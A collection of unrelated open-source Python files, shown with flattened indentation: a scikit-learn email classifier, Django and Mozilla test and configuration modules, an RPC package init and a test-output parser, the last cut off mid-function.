# libSigNetSim is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# libSigNetSim is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with libSigNetSim. If not, see <http://www.gnu.org/licenses/>.
"""
This file ...
"""
class RuledVariable(object):
def __init__(self, model):
self.__model = model
self.__isRuled = False
self.__isRuledBy = None
def setRuledBy(self, rule, shift=0):
self.__isRuled = True
self.__isRuledBy = rule.objId + shift
def unsetRuledBy(self):
self.__isRuled = False
self.__isRuledById = None
def isRuled(self):
return self.__isRuled
def isRuledBy(self):
if self.isRuled():
return self.__model.listOfRules[self.__isRuledBy]
else:
return None
def isRateRuled(self):
""" Tests is the compartment size is computed with a rate rule """
return self.isRuled() and self.__model.listOfRules[self.__isRuledBy].isRate()
def isAssignmentRuled(self):
""" Tests is the compartment size is computed with a rate rule """
return self.isRuled() and self.__model.listOfRules[self.__isRuledBy].isAssignment()
|
discipl/NAML
|
app/ml_model_v1.py
|
#standard packages
import pandas as pd
import numpy as np
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
matplotlib.use('Agg')
import sqlite3
import pickle
import re
from flask import json
from sklearn.pipeline import Pipeline
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import MultinomialNB, BernoulliNB
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier
from sklearn.model_selection import ShuffleSplit, RandomizedSearchCV
from sklearn.base import BaseEstimator
from scipy.stats import randint, expon, norm
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score, precision_score
from sklearn.metrics import make_scorer
from nltk.corpus import stopwords
from nltk.stem.snowball import DutchStemmer
from functools import partial,reduce
import os
localdir = '/app'
path_database = localdir + '/static/data/databases/'
filename_database = 'database_NA_v1.db'
path_thresholds =localdir + '/static/Images/'
filename_thresholds = 'thresholds.npy'
path_confusion_matrix = localdir + '/static/Images/confusion_matrices_NA/'
path_wordcloud = localdir + '/static/Images/wordcloud_NA/'
path_pies = localdir + '/static/Images/pies_NA/'
path_rocs = localdir + '/static/Images/rocs_NA/'
path_models = localdir + '/static/Images/models_NA/'
path_emails_feature_importance = localdir + '/static/Images/Emails/feature_importance_email_NA/'
path_emails_pie_prob = localdir + '/static/Images/Emails/pie_probability_NA/'
path_info_images = localdir + '/static/Images/'
filename_info_images = 'filenames_imagesNA.npy'
path_json_info_email_images = localdir + '/static/Images/Emails/'
filename_json_info_email_images = 'json_email_data_NA.txt'
path_user_email_images = localdir + '/static/Images/Emails/Users/'
def tokenize(text, stop, stemmer):
"""Converts text to tokens."""
# tokens = word_tokenize(text, language='dutch')
tokens = [word.lower() for word in text.split()]
tokens = [i for i in tokens if i not in stop]
tokens = ["".join(re.findall("[a-zA-Z]+", word)) for word in tokens]
tokens = list(filter(lambda x: len(x) > 2, tokens))
# tokens = [stemmer.stem(word) for word in tokens]
return tokens
model_dict = {'mnb': MultinomialNB(fit_prior=False), 'rf': RandomForestClassifier(n_estimators=50),
'etr': ExtraTreesClassifier(n_estimators=50)}
def load_filenames_images():
filenames_dict = np.load(path_info_images+filename_info_images).item()
return filenames_dict
def get_threshold_dic():
return np.load(path_thresholds+filename_thresholds ).item()
def set_threshold_dic(name_model,new_thres):
old_thresholds = np.load(path_thresholds+filename_thresholds ).item()
print('delete old thresholds...')
os.remove(path_thresholds+filename_thresholds)
old_thresholds[name_model] = new_thres
np.save(path_thresholds+filename_thresholds , old_thresholds)
threshold_dic = get_threshold_dic()
def get_estimator(model_name = 'mnb'):
stopwords = set(stopwords.words('dutch'))
dutch_stemmer = stemmer = DutchStemmer()
model = model_dict[model_name]
estimator = Pipeline(steps=[
('vectorizer', TfidfVectorizer(input=u'content', encoding=u'latin1', decode_error=u'strict', strip_accents=None,
lowercase=True,
preprocessor=None,
tokenizer=partial(tokenize, stop=stopwords, stemmer=dutch_stemmer),
analyzer=u'word', # stop_words=(stopwords.words('dutch')),
ngram_range=(1, 3), # max_df=0.9, min_df=0.005,
max_features=10000, vocabulary=None, binary=False,
norm=u'l1', use_idf=True, smooth_idf=True, sublinear_tf=False)),
('classifier', model)
]
)
return estimator
def get_train_test(path_database,filename_database,test_size=0.3):
df = pd.DataFrame()
index_ = 0
conn = sqlite3.connect(path_database+filename_database)
c = conn.cursor()
c.execute('SELECT mail_id,body,truth_class FROM TABLE_MAILS ')
for x in c:
df = pd.concat([df, pd.DataFrame({'Id': x[0], 'body': x[1], 'Target': x[2]}, index=[index_])])
index_ += 1
conn.close()
df = df.loc[(df['body'].notnull()) & (df['Target'].notnull()), :]
X = df['body'].astype(str).values
y = df['Target'].astype(int).values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=0)
return X_train, X_test, y_train, y_test
#
# def get_mail_test(mail_id):
# X,y,df = get_mail(path_database,filename_database,mail_id)
# return df
def get_mail(path_database,filename_database,mail_id):
df = pd.DataFrame()
index_ = 0
conn = sqlite3.connect(path_database+filename_database)
c = conn.cursor()
c.execute('SELECT mail_id,body,truth_class,date_sent,from_email_address,subject FROM TABLE_MAILS where mail_id=?',[(mail_id)])
for x in c:
df = pd.concat([df, pd.DataFrame({'Id': x[0], 'body': x[1], 'Target': x[2], 'Date':x[3],'From':x[4],'Subject':x[5]}, index=[index_])])
index_ += 1
break
conn.close()
X = df['body'].astype(str).values
target = df['Target'].astype(str).values[0]
return X,target,df
def get_n_mails_of(path_database,filename_database, nmails=10, address=''):
index_ = 0
df = pd.DataFrame()
conn = sqlite3.connect(path_database + filename_database)
c = conn.cursor()
c.execute('SELECT mail_id,body,truth_class,date_sent,from_email_address,subject FROM TABLE_MAILS ')
for x in c:
df = pd.concat([df, pd.DataFrame({'Id': x[0], 'body': x[1], 'Target': x[2], 'Date':x[3],'From':x[4],'Subject':x[5]}, index=[index_])])
index_ += 1
if(index_>=nmails):
break
conn.close()
print(df.columns)
return df
def fit_model(X,y,estimator,weights = [0.49,0.5]):
sample_weights = (y == 0) * weights[0] + (y == 1) * weights[1]
estimator.fit(X, y, **{'classifier__sample_weight': sample_weights} )
return estimator
def predict_target(X,name_model,estimator):
th = threshold_dic[name_model]
y_score = estimator.predict_proba(X)
y_pred = (y_score[:, 0] < th).astype(int)
return y_pred
def fit_grid_search(X,y,name_model='mnb',n_splits=3,n_iter=10):
class weightEst(BaseEstimator):
def __init__(self, w_0, w_1, thres):
self.w_0 = w_0
self.w_1 = w_1
self.thres = thres
self.estimator = get_estimator(name_model)
def fit(self, X, y):
weight = self.w_0 * (y == 0) + self.w_1 * (y == 1)
self.estimator.fit(X, y, **{'classifier__sample_weight': weight} )
return self
def predict(self, X):
score = self.estimator.predict_proba(X)
ypred = (score[:, 0] < self.thres).astype(int)
return ypred
def predict_proba(self, X):
score = self.estimator.predict_proba(X)
return score
def get_params(self, deep=True):
params = {'w_0': self.w_0, 'w_1': self.w_1, 'thres': self.thres}
return params
def set_params(self, **params):
self.w_0 = params['w_0']
self.w_1 = params['w_1']
self.thres = params['thres']
return self
estimator = weightEst(0.5, 0.5, 0.5)
cv_dev = ShuffleSplit(n_splits=n_splits, test_size=0.3)
scorer = make_scorer(accuracy_score)
grid_search = RandomizedSearchCV(estimator,
scoring=scorer,
refit=True,
cv=cv_dev,
n_iter=n_iter,
param_distributions={'w_0': norm(0.5, 0.1), 'w_1': norm(0.5, 0.1),
'thres': norm(0.5, 0.1)},
verbose=4
)
grid_search.fit(X, y)
clf = grid_search.best_estimator_
print('Best Parameters...')
print(grid_search.best_params_)
print('Best Score...')
print(grid_search.best_score_)
return {'opt_estimator':clf.estimator,'opt_weight_taak':clf.w_0,'opt_weight_non_taak':clf.w_1,'opt_thres':clf.thres}
########################################################################################################################
# MODEL PROPERTIES #
########################################################################################################################
def get_logProb(estimator,name_model,class_label):
if (name_model == 'mnb'):
logProb = estimator.named_steps['classifier'].feature_log_prob_
if(class_label == 'NON_TAAK'):
return logProb[1,:]
elif(class_label == 'TAAK'):
return logProb[0,:]
else:
return None
elif(name_model == 'rf'):
p = estimator.named_steps['classifier'].feature_importances_
logProb = np.log( 1e-10 + p/np.sum(p) )
return logProb
elif(name_model == 'etr'):
p = estimator.named_steps['classifier'].feature_importances_
logProb = np.log( 1e-10 + p/np.sum(p) )
return logProb
else:
return None
def get_model_properties(estimator,name_model,class_label):
log_probs = get_logProb(estimator,name_model,class_label)
words_key = estimator.named_steps['vectorizer'].vocabulary_
key_words = dict(zip([item[1] for item in words_key.items()],[item[0] for item in words_key.items()]))
return log_probs,words_key,key_words
########################################################################################################################
# FIGURES #
########################################################################################################################
def add_new_email_images(mail_id,user='Mette'):
spam_ham_dic = {'0': 'TAAK', '1': 'NON_TAAK'}
def shorten_word(word,MAX_LEN=35):
if len(word)>MAX_LEN:
return word[:MAX_LEN]+'...'
return word
with open(path_json_info_email_images + "Users/"+user+'/'+ filename_json_info_email_images, 'r') as outfile:
json_email_data = json.load(outfile)
print(json_email_data.keys())
X,target,df = get_mail(path_database, filename_database, mail_id)
for name_model in model_dict.keys():
for filename in os.listdir(path_models+name_model+'/'):
if ( filename.split('.')[1]== 'pkl'):
filename_model = filename
break
with open(path_models + name_model+'/'+filename_model, 'rb') as fid:
estimator = pickle.load(fid)
log_probs, words_key, key_words = get_model_properties(estimator, name_model, 'TAAK')
body = X
date = df['Date']
_from = df['From']
subject = df['Subject']
X_transformed = estimator.named_steps['vectorizer'].transform(body)
word_list = create_word_list(X_transformed, estimator, name_model, key_words)
score = estimator.predict_proba(body)
y_pred = int(score[0][0] < threshold_dic[name_model])
print(X_transformed.shape)
html_body = return_html_body(body[0], word_list, y_pred, top_n_words=20)
extra_info = 'email_' + mail_id.replace('.','').replace('>','').replace('<','').replace('/','').replace('\\','')
create_prob_pie_email(name_model, score[0][0], extra_info , user,threshold_dic[name_model])
create_feature_importance_email(name_model, word_list, extra_info ,user, top_n_words=5)
print('here...')
#print(y)
email_data = {'pred': spam_ham_dic[str(y_pred)],
'truth': spam_ham_dic.get(target,'NONE'),
'date': date[0],
'from': _from[0],
'subject': shorten_word(subject[0]),
'html_body': html_body,
'eFimp': "/static/Images/Emails/Users/"+user+'/feature_importance_email_NA/' + name_model + '/' + "efeature_imp_" + extra_info + '.png',
'epie': "/static/Images/Emails/Users/" +user+'/pie_probability_NA/'+ name_model + '/' + "epie_prob_" + extra_info + '.png'}
if name_model not in json_email_data.keys():
json_email_data[name_model] = list([email_data])
else:
json_email_data[name_model]+= [email_data]
print('Remove old file...')
os.remove(path_json_info_email_images + "Users/"+user+'/'+ filename_json_info_email_images)
print('Create new file')
with open( path_json_info_email_images + "Users/"+user+'/'+ filename_json_info_email_images, 'w') as outfile:
json.dump(json_email_data, outfile)
def clean_dir(pathdir,extra_dir = ''):
'''
:param pathdir:
:return: deletes all .png and .txt within the dir
'''
for filename in os.listdir(pathdir+extra_dir):
if (filename.split('.')[1]== 'txt') or (filename.split('.')[1]== 'png')or (filename.split('.')[1]== 'pkl'):
print('Deleting File: '+str(filename) )
os.remove(pathdir+extra_dir+filename)
def clean_file(pathdir,selectFilename):
'''
:param pathdir:
:return: deletes all .png and .txt within the dir
'''
for filename in os.listdir(pathdir):
if (filename== selectFilename):
print('Deleting File: '+str(filename) )
os.remove(pathdir+filename)
if __name__ == '__main__':
X_train, X_test, y_train, y_test = get_train_test(path_database, filename_database, test_size=0.3)
fit_grid_search(X_train,y_train,name_model='etr',n_splits=3,n_iter=10)
|
freieslabor/info-display
|
info_display/screens/announcer/models.py
|
from django.db import models
from django.contrib.auth.models import User
class Announcement(models.Model):
author = models.ForeignKey(
User,
related_name='+',
verbose_name='Reporter'
)
title = models.CharField(
verbose_name='Title',
max_length=256
)
created = models.DateTimeField(
verbose_name='Created',
auto_now_add=True,
editable=False
)
body = models.TextField(
verbose_name='body'
)
|
jwhitlock/kuma
|
kuma/scrape/tests/test_source.py
|
# -*- coding: utf-8 -*-
"""Tests for the Source class."""
from __future__ import unicode_literals
import mock
import pytest
from kuma.scrape.sources import Source
from . import mock_requester, mock_storage
class FakeSource(Source):
"""A Fake source for testing shared Source functionality."""
PARAM_NAME = 'name'
OPTIONS = {
'pressed': ('bool', False),
'length': ('int', 0),
'unbounded': ('int_all', 0),
'flavor': ('text', ''),
}
def test_init_param():
"""Omitted Source parameters are initialized to defaults."""
source = FakeSource('param')
assert source.name == 'param'
assert source.length == 0
assert source.pressed is False
assert source.unbounded == 0
assert source.flavor == ''
@pytest.mark.parametrize(
'option,value',
(('pressed', True),
('length', 1),
('unbounded', 'all'),
('flavor', 'curry'),
), ids=('bool', 'int', 'int_all', 'text'))
def test_init_options(option, value):
"""Source parameters are initialized by name."""
source = FakeSource('popcorn', **{option: value})
assert source.name == 'popcorn'
assert getattr(source, option) == value
def test_init_invalid_option():
"""An invalid parameter name raises an exception."""
with pytest.raises(Exception):
FakeSource('param', unknown=1)
def test_merge_none():
"""An empty merge does not change the Source state."""
source = FakeSource('merge')
source.state = source.STATE_PREREQ
assert source.merge_options() == {}
assert source.state == source.STATE_PREREQ
@pytest.mark.parametrize(
'option,lesser_value,greater_value',
(('pressed', False, True),
('length', 1, 2),
('unbounded', 2, 3),
), ids=('bool', 'int', 'int_all'))
def test_merge_less(option, lesser_value, greater_value):
"""A merge to smaller parameters keeps the current values and state."""
source = FakeSource('merge', **{option: greater_value})
source.state = source.STATE_PREREQ
assert source.merge_options(**{option: lesser_value}) == {}
assert getattr(source, option) == greater_value
assert source.state == source.STATE_PREREQ
@pytest.mark.parametrize(
'option,value',
(('pressed', True),
('length', 2),
('unbounded', 1),
('flavor', 'country'),
), ids=('bool', 'int', 'int_all', 'text'))
def test_merge_same(option, value):
"""A merge with the current values keeps the current state."""
source = FakeSource('merge', **{option: value})
source.state = source.STATE_PREREQ
assert source.merge_options(**{option: value}) == {}
assert getattr(source, option) == value
assert source.state == source.STATE_PREREQ
@pytest.mark.parametrize(
'option,lesser_value,greater_value',
(('pressed', False, True),
('length', 1, 2),
('unbounded', 2, 3),
), ids=('bool', 'int', 'int_all'))
def test_merge_upgrade(option, lesser_value, greater_value):
"""An updating merge updates the values and resets the state."""
source = FakeSource('merge', **{option: lesser_value})
source.state = source.STATE_PREREQ
result = source.merge_options(**{option: greater_value})
assert result == {option: greater_value}
assert getattr(source, option) == greater_value
assert source.state == source.STATE_INIT
def test_merge_more_multiple():
"""Multiple parameters can be updated in one merge call."""
source = FakeSource('merge')
res = source.merge_options(
length=1, pressed=True, unbounded=1, flavor='salty')
assert res == {
'length': 1, 'pressed': True, 'unbounded': 1, 'flavor': 'salty'}
def test_merge_int_all():
"""For the 'int_all' parameter type, 'all' is a valid and maximum value."""
source = FakeSource('merge')
assert source.merge_options(unbounded='all') == {'unbounded': 'all'}
assert source.merge_options(unbounded='all') == {}
def test_merge_text():
"""For the 'text' parameter type, any non-empty change is an update."""
source = FakeSource('merge')
assert source.merge_options(flavor='sweet') == {'flavor': 'sweet'}
assert source.merge_options(flavor='sour') == {'flavor': 'sour'}
assert source.merge_options(flavor='sour') == {}
assert source.merge_options(flavor='sweet') == {'flavor': 'sweet'}
assert source.merge_options(flavor='') == {}
def test_current_options_default():
"""current_options returns empty dict for default options."""
source = FakeSource('default')
assert source.current_options() == {}
@pytest.mark.parametrize(
'option,value',
(('pressed', True),
('length', 1),
('unbounded', 'all'),
('flavor', 'curry'),
), ids=('bool', 'int', 'int_all', 'text'))
def test_current_options_nondefault(option, value):
"""current_options returns the non-default options as a dict."""
source = FakeSource('default', **{option: value})
assert source.current_options() == {option: value}
@pytest.mark.parametrize(
'option_type,option,bad_value',
(('bool', 'pressed', 1),
('int', 'length', '0'),
('int_all', 'unbounded', '1'),
('text', 'flavor', 1),
), ids=('bool', 'int', 'int_all', 'text'))
def test_invalid_values(option_type, option, bad_value):
"""Invalid parameter values raise a ValueError."""
with pytest.raises(ValueError) as err:
FakeSource('fails', **{option: bad_value})
assert option_type in str(err.value)
@pytest.mark.parametrize(
"href,decoded", [
(b'binary', u'binary'),
(b'%E7%A7%BB%E8%A1%8C%E4%BA%88%E5%AE%9A', u'移行予定'),
(u'Slug#Anchor_\u2014_With_Dash', u'Slug#Anchor_\u2014_With_Dash'),
])
def test_decode_href(href, decoded):
"""Source.decode_href() turns URL-encoded hrefs into unicode strings."""
source = FakeSource('conversions')
assert decoded == source.decode_href(href)
def test_source_error_str():
"""The Source.Error exception can be turned into a string."""
error1 = Source.SourceError('A simple error')
assert "%s" % error1 == 'A simple error'
error2 = Source.SourceError('A formatted error, like "%s" and %d.',
"a string", 123)
assert "%s" % error2 == 'A formatted error, like "a string" and 123.'
def test_gather_done_is_done():
"""A source that is done can still be gathered."""
source = FakeSource('existing')
source.state = source.STATE_DONE
assert source.gather(mock_requester(), mock_storage()) == []
assert source.state == source.STATE_DONE
assert source.freshness == source.FRESH_UNKNOWN
def test_gather_load_storage_existing():
"""A source that is already in storage loads quickly."""
source = FakeSource('existing')
source.load_and_validate_existing = mock.Mock(
return_value=(True, ['next']))
ret = source.gather(mock_requester(), mock_storage())
assert ret == ['next']
assert source.state == source.STATE_DONE
assert source.freshness == source.FRESH_NO
def test_gather_load_storage_error():
"""A source can raise an error when loading from storage."""
source = FakeSource('existing')
source.load_and_validate_existing = mock.Mock(
side_effect=source.SourceError('Storage complained.'))
ret = source.gather(mock_requester(), mock_storage())
assert ret == []
assert source.state == source.STATE_ERROR
assert source.freshness == source.FRESH_UNKNOWN
def test_gather_load_prereqs_more_needed():
"""A source can request other sources as prerequisites."""
source = FakeSource('needs_prereqs')
data = {'needs': ['bonus']}
source.load_prereqs = mock.Mock(return_value=(False, data))
ret = source.gather(mock_requester(), mock_storage())
assert ret == ['bonus']
assert source.state == source.STATE_PREREQ
assert source.freshness == source.FRESH_UNKNOWN
def test_gather_load_prereqs_error():
"""A source may raise an error when loading prerequisites."""
source = FakeSource('bad_prereqs')
source.load_prereqs = mock.Mock(side_effect=source.SourceError('bad'))
ret = source.gather(mock_requester(), mock_storage())
assert ret == []
assert source.state == source.STATE_ERROR
assert source.freshness == source.FRESH_UNKNOWN
def test_gather_save_data_error():
"""A source can fail when saving the data."""
source = FakeSource('needs_prereqs')
source.load_prereqs = mock.Mock(return_value=(True, {}))
source.save_data = mock.Mock(side_effect=source.SourceError('failed'))
ret = source.gather(mock_requester(), mock_storage())
assert ret == []
assert source.state == source.STATE_ERROR
assert source.freshness == source.FRESH_YES
def test_gather_success_with_more_sources():
"""A source with all prereqs can request further sources."""
source = FakeSource('needs_prereqs')
source.load_prereqs = mock.Mock(return_value=(True, {}))
source.save_data = mock.Mock(return_value=['bonus'])
ret = source.gather(mock_requester(), mock_storage())
assert ret == ['bonus']
assert source.state == source.STATE_DONE
assert source.freshness == source.FRESH_YES
|
seprich/py-bson-rpc
|
bsonrpc/__init__.py
|
# -*- coding: utf-8 -*-
'''
Library for JSON RPC 2.0 and BSON RPC
'''
from bsonrpc.exceptions import BsonRpcError
from bsonrpc.framing import (
JSONFramingNetstring, JSONFramingNone, JSONFramingRFC7464)
from bsonrpc.interfaces import (
notification, request, rpc_notification, rpc_request, service_class)
from bsonrpc.options import NoArgumentsPresentation, ThreadingModel
from bsonrpc.rpc import BSONRpc, JSONRpc
from bsonrpc.util import BatchBuilder
__version__ = '0.2.1'
__license__ = 'http://mozilla.org/MPL/2.0/'
__all__ = [
'BSONRpc',
'BatchBuilder',
'BsonRpcError',
'JSONFramingNetstring',
'JSONFramingNone',
'JSONFramingRFC7464',
'JSONRpc',
'NoArgumentsPresentation',
'ThreadingModel',
'notification',
'request',
'rpc_notification',
'rpc_request',
'service_class',
]
|
ericawright/bedrock
|
tests/functional/firefox/new/test_download.py
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import pytest
from pages.firefox.new.download import DownloadPage
# ?v=a param added temporarily to evade a traffic cop experiment
# See https://github.com/mozilla/bedrock/issues/9019
@pytest.mark.sanity
@pytest.mark.nondestructive
def test_download_button_displayed(base_url, selenium):
page = DownloadPage(selenium, base_url, params='?v=a').open()
assert page.download_button.is_displayed
# Firefox and Internet Explorer don't cope well with file prompts whilst using Selenium.
@pytest.mark.skip_if_firefox(reason='http://saucelabs.com/jobs/5a8a62a7620f489d92d6193fa67cf66b')
@pytest.mark.skip_if_internet_explorer(reason='https://github.com/SeleniumHQ/selenium/issues/448')
@pytest.mark.nondestructive
def test_click_download_button(base_url, selenium):
page = DownloadPage(selenium, base_url, params='?v=a').open()
thank_you_page = page.download_firefox()
assert thank_you_page.seed_url in selenium.current_url
@pytest.mark.nondestructive
def test_other_platforms_modal(base_url, selenium):
page = DownloadPage(selenium, base_url, params='?v=a').open()
modal = page.open_other_platforms_modal()
assert modal.is_displayed
modal.close()
@pytest.mark.nondestructive
@pytest.mark.skip_if_not_firefox(reason='Join Firefox form is only displayed to Firefox users')
def test_firefox_account_modal(base_url, selenium):
page = DownloadPage(selenium, base_url, params='?v=a').open()
modal = page.open_join_firefox_modal()
assert modal.is_displayed
modal.close()
|
willkg/socorro-collector
|
collector/app/for_application_defaults.py
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""This is an extension to configman for Socorro. It creates a ValueSource
object that is also a 'from_string_converter'. It is tailored to work with
the Socorro 'application' configuration parameter. Once configman has made
a final determination as to which application to actually run, this class
allows Configman to go to that application and fetch its preferred defaults
for the rest of options required by that application."""
from configman.converters import str_to_python_object
from configman.dotdict import DotDict
#==============================================================================
class ApplicationDefaultsProxy(object):
"""a placeholder class that will induce configman to query the application
object for the application's preferred defaults. """
def __init__(self):
self.application_defaults = DotDict()
self.apps = self.find_all_the_apps()
#--------------------------------------------------------------------------
def str_to_application_class(self, an_app_key):
"""a configman compatible str_to_* converter"""
try:
app_class = str_to_python_object(self.apps[an_app_key])
except KeyError:
app_class = str_to_python_object(an_app_key)
try:
self.application_defaults = DotDict(
app_class.get_application_defaults()
)
except AttributeError:
# no get_application_defaults, skip this step
pass
return app_class
#--------------------------------------------------------------------------
@staticmethod
def find_all_the_apps():
"""in the future, re-implement this as an automatic discovery service
"""
return {
'collector': 'collector.collector_app.CollectorApp',
'collector2015': 'collector.collector_app.Collector2015App',
'crashmover': 'collector.crashmover_app.CrashMoverApp',
'fetch': 'collector.external.fetch_app.FetchApp',
'copy_processed': 'collector.collector.crashmover_app.ProcessedCrashCopierApp',
'copy_raw_and_processed': 'collector.collector.crashmover_app.RawAndProcessedCopierApp',
'reprocess_crashlist': 'collector.external.rabbitmq.reprocess_crashlist.ReprocessCrashlistApp',
'purge_rmq': 'collector.external.rabbitmq.purge_queue_app.PurgeRabbitMQQueueApp',
}
can_handle = (
ApplicationDefaultsProxy
)
#==============================================================================
class ValueSource(object):
"""This is meant to be used as both a value source and a from string
converter. An instance, as a value source, always returns an empty
dictionary from its 'get_values' method. However, if it gets used as
a 'from string' converter, the 'get_values' behavior changes. Just before
the 'from string' converter returns the conversion result, this class calls
the method 'get_application_defaults' on it and saves the result. That
saved result becomes the new value for 'get_values' to return.
The end result is that an app that has a prefered set of defaults can still
get them loaded and used even if the app was itself loaded through
Configman.
"""
#--------------------------------------------------------------------------
def __init__(self, source, the_config_manager=None):
self.source = source
#--------------------------------------------------------------------------
def get_values(self, config_manager, ignore_mismatches, obj_hook=DotDict):
if isinstance(self.source.application_defaults, obj_hook):
return self.source.application_defaults
return obj_hook(self.source.application_defaults)
|
cstipkovic/spidermonkey-research
|
testing/mozharness/mozharness/mozilla/testing/unittest.py
|
#!/usr/bin/env python
# ***** BEGIN LICENSE BLOCK *****
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
# ***** END LICENSE BLOCK *****
import os
import re
from mozharness.mozilla.testing.errors import TinderBoxPrintRe
from mozharness.base.log import OutputParser, WARNING, INFO, CRITICAL, ERROR
from mozharness.mozilla.buildbot import TBPL_WARNING, TBPL_FAILURE, TBPL_RETRY
from mozharness.mozilla.buildbot import TBPL_SUCCESS, TBPL_WORST_LEVEL_TUPLE
SUITE_CATEGORIES = ['mochitest', 'reftest', 'xpcshell']
def tbox_print_summary(pass_count, fail_count, known_fail_count=None,
crashed=False, leaked=False):
emphasize_fail_text = '<em class="testfail">%s</em>'
if pass_count < 0 or fail_count < 0 or \
(known_fail_count is not None and known_fail_count < 0):
summary = emphasize_fail_text % 'T-FAIL'
elif pass_count == 0 and fail_count == 0 and \
(known_fail_count == 0 or known_fail_count is None):
summary = emphasize_fail_text % 'T-FAIL'
else:
str_fail_count = str(fail_count)
if fail_count > 0:
str_fail_count = emphasize_fail_text % str_fail_count
summary = "%d/%s" % (pass_count, str_fail_count)
if known_fail_count is not None:
summary += "/%d" % known_fail_count
# Format the crash status.
if crashed:
summary += " %s" % emphasize_fail_text % "CRASH"
# Format the leak status.
if leaked is not False:
summary += " %s" % emphasize_fail_text % (
(leaked and "LEAK") or "L-FAIL")
return summary
class TestSummaryOutputParserHelper(OutputParser):
def __init__(self, regex=re.compile(r'(passed|failed|todo): (\d+)'), **kwargs):
self.regex = regex
self.failed = 0
self.passed = 0
self.todo = 0
self.last_line = None
self.tbpl_status = TBPL_SUCCESS
self.worst_log_level = INFO
super(TestSummaryOutputParserHelper, self).__init__(**kwargs)
def parse_single_line(self, line):
super(TestSummaryOutputParserHelper, self).parse_single_line(line)
self.last_line = line
m = self.regex.search(line)
if m:
try:
setattr(self, m.group(1), int(m.group(2)))
except ValueError:
# ignore bad values
pass
def evaluate_parser(self, return_code, success_codes=None):
if return_code == 0 and self.passed > 0 and self.failed == 0:
self.tbpl_status = TBPL_SUCCESS
elif return_code == 10 and self.failed > 0:
self.tbpl_status = TBPL_WARNING
else:
self.tbpl_status = TBPL_FAILURE
self.worst_log_level = ERROR
return (self.tbpl_status, self.worst_log_level)
def print_summary(self, suite_name):
# generate the TinderboxPrint line for TBPL
emphasize_fail_text = '<em class="testfail">%s</em>'
failed = "0"
if self.passed == 0 and self.failed == 0:
self.tsummary = emphasize_fail_text % "T-FAIL"
else:
if self.failed > 0:
failed = emphasize_fail_text % str(self.failed)
self.tsummary = "%d/%s/%d" % (self.passed, failed, self.todo)
self.info("TinderboxPrint: %s<br/>%s\n" % (suite_name, self.tsummary))
def append_tinderboxprint_line(self, suite_name):
self.print_summary(suite_name)
class DesktopUnittestOutputParser(OutputParser):
"""
A class that extends OutputParser such that it can parse the number of
passed/failed/todo tests from the output.
"""
def __init__(self, suite_category, **kwargs):
# worst_log_level defined already in DesktopUnittestOutputParser
# but is here to make pylint happy
self.worst_log_level = INFO
super(DesktopUnittestOutputParser, self).__init__(**kwargs)
self.summary_suite_re = TinderBoxPrintRe.get('%s_summary' % suite_category, {})
self.harness_error_re = TinderBoxPrintRe['harness_error']['minimum_regex']
self.full_harness_error_re = TinderBoxPrintRe['harness_error']['full_regex']
self.harness_retry_re = TinderBoxPrintRe['harness_error']['retry_regex']
self.fail_count = -1
self.pass_count = -1
# known_fail_count does not exist for some suites
self.known_fail_count = self.summary_suite_re.get('known_fail_group') and -1
self.crashed, self.leaked = False, False
self.tbpl_status = TBPL_SUCCESS
def parse_single_line(self, line):
if self.summary_suite_re:
summary_m = self.summary_suite_re['regex'].match(line) # pass/fail/todo
if summary_m:
message = ' %s' % line
log_level = INFO
# remove all the none values in groups() so this will work
# with all suites including mochitest browser-chrome
summary_match_list = [group for group in summary_m.groups()
if group is not None]
r = summary_match_list[0]
if self.summary_suite_re['pass_group'] in r:
if len(summary_match_list) > 1:
self.pass_count = int(summary_match_list[-1])
else:
# This handles suites that either pass or report
# number of failures. We need to set both
# pass and fail count in the pass case.
self.pass_count = 1
self.fail_count = 0
elif self.summary_suite_re['fail_group'] in r:
self.fail_count = int(summary_match_list[-1])
if self.fail_count > 0:
message += '\n One or more unittests failed.'
log_level = WARNING
# If self.summary_suite_re['known_fail_group'] == None,
# then r should not match it, # so this test is fine as is.
elif self.summary_suite_re['known_fail_group'] in r:
self.known_fail_count = int(summary_match_list[-1])
self.log(message, log_level)
return # skip harness check and base parse_single_line
harness_match = self.harness_error_re.match(line)
if harness_match:
self.warning(' %s' % line)
self.worst_log_level = self.worst_level(WARNING, self.worst_log_level)
self.tbpl_status = self.worst_level(TBPL_WARNING, self.tbpl_status,
levels=TBPL_WORST_LEVEL_TUPLE)
full_harness_match = self.full_harness_error_re.match(line)
if full_harness_match:
r = full_harness_match.group(1)
if r == "application crashed":
self.crashed = True
elif r == "missing output line for total leaks!":
self.leaked = None
else:
self.leaked = True
return # skip base parse_single_line
if self.harness_retry_re.search(line):
self.critical(' %s' % line)
self.worst_log_level = self.worst_level(CRITICAL, self.worst_log_level)
self.tbpl_status = self.worst_level(TBPL_RETRY, self.tbpl_status,
levels=TBPL_WORST_LEVEL_TUPLE)
return # skip base parse_single_line
super(DesktopUnittestOutputParser, self).parse_single_line(line)
def evaluate_parser(self, return_code, success_codes=None):
success_codes = success_codes or [0]
if self.num_errors: # mozharness ran into a script error
self.tbpl_status = self.worst_level(TBPL_FAILURE, self.tbpl_status,
levels=TBPL_WORST_LEVEL_TUPLE)
# I have to put this outside of parse_single_line because this checks not
# only if fail_count was more then 0 but also if fail_count is still -1
# (no fail summary line was found)
if self.fail_count != 0:
self.worst_log_level = self.worst_level(WARNING, self.worst_log_level)
